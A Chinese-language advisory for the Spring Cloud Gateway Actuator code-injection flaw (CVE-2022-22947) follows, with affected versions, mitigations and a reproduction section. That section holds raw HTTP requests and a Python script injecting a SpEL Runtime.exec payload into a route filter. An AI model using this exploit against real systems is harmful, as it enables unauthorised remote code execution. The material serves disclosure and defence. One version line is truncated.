0x00 概要
当Spring Cloud Gateway启用、暴露 和不安全Gateway Actuator 端点时,攻击者可以通过向使用 Spring Cloud Gateway 的应用程序发送特制的恶意请求,触发远程任意代码执行,利用难度低,目前POC已公开,风险较高。
Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。
0x01 威胁级别
威胁级别:【严重】
0x02 影响范围
影响版本:
3.1.x系列:Spring Cloud Gateway < 3.1.
3.0.x系列:Spring Cloud Gateway < 3.0.7
其他旧的、不受支持的Spring Cloud Gateway版本
安全版本:
Spring Cloud Gateway >= 3.1.1
Spring Cloud Gateway >= 3.0.7
0x03 漏洞处置
1、目前官方已发布修复版本修复了该漏洞,请受影响的用户升级到安全版本:
https://github.com/spring-cloud/spring-cloud-gateway/tags
2、无法及时升级的用户,可参考官方提供的修复建议进行缓解:
如果不需要Gateway Actuator 端点,通过 management.endpoint.gateway.enabled: false 禁用它。
0x04 漏洞复现
- 下载spring-gateway-demo的jar包
https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar - 运行spring-gateway-demo的jar包
java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar - 在浏览器中访问该微服务:
http://127.0.0.1:9000/actuator/ - 发送报文创建新的路由
注:此条中的命令为真正执行的命令,不同于条目5中的命令。
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json
Content-Length: 382
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/new_route/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/x\")}",
"_genkey_1": "/${path}"
}
}
],
"uri": "https://wya.pl",
"order": 0
}
- 刷新,成功执行命令
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/json
Connection: close
Content-Length: 268
{
"predicate": "Paths: [/new_route], match trailing slash: true",
"route_id": "new_route",
"filters": [
"[[RewritePath #{T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/x\")} = /${path}], order = 1]"
],
"uri": "https://wya.pl",
"order": 0
}
简单的利用脚本如下,python3 spring_cloud_RCE.py
#from itsdangerous import json
import requests
def exec(url):
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36',
'content-type':'application/json'
}
payload2 = '''{ "predicates": [ { "name": "Path", "args": { "_genkey_0": "/new_route/**" } } ], "filters": [ { "name": "RewritePath", "args": { "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/x\\\")}", "_genkey_1": "/${path}" } } ], "uri": "https://wya.pl", "order": 0 }'''
payload1 = '''{ "predicate": "Paths: [/new_route], match trailing slash: true", "route_id": "new_route", "filters": [ "[[RewritePath #{T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/x\\\")} = /${path}], order = 1]" ], "uri": "https://wya.pl", "order": 0 }'''
print("payload2: " + payload2)
print("payload1: " + payload1)
url2 = url + "/actuator/gateway/routes/new_route"
url1 = url + "/actuator/gateway/refresh"
re2 = requests.post(url=url2,data=payload2,headers=headers)
print (re2, re2.content)
re1 = requests.post(url=url1,data=payload1,headers=headers)
print (re2, re1.content)
if __name__ == "__main__":
exec("http://127.0.0.1:9000")
0x05 漏洞触发条件
- 需要spring-cloud-starter-gateway和spring-boot-starter-actuator同时存在,该利用路径其实是通过actuator进入的;
- 需要在actuator上开启gateway暴露
在actuator 2.x系列中,web端默认只暴露了info和health,需要在配置文件中添加如下几行才会开启gateway暴露,利用才能成功。
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=gateway
References
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
https://www.huaweicloud.com/notice/2022/20220303002755102.html
https://github.com/wdahlenburg/spring-gateway-demo
https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947
https://blog.csdn.net/alinyua/article/details/80009435
